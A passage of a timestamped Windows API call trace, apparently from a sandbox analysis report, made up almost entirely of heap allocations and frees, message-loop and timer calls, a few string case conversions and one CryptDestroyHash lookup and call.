lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0162.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0162.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0162.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0162.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0162.105] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0162.105] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0162.105] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0162.105] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0162.105] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0162.105] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0162.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0162.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0162.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0162.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0162.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0162.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0162.106] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0162.106] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0162.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0162.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0162.107] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0162.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0162.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0162.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0162.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0162.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0162.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0162.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0162.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0162.112] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0162.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0162.112] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0162.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0162.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0162.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0162.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0162.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0162.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0162.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0162.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0162.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0162.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0162.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0162.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0162.114] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0162.114] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0162.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0162.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.115] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0162.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0162.115] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0162.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0162.115] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0162.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0162.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0162.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0162.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0162.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0162.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0162.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0162.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0162.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0162.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0162.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0162.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0162.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0162.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0162.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0162.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0162.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0162.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0162.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0162.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0162.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0162.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0162.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0162.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0162.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0162.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0162.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e30 [0162.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0162.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0162.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0162.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0162.134] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0162.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0162.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0162.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0162.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0162.135] CryptDestroyHash (hHash=0xaa5660) returned 1 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0162.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0162.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0162.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 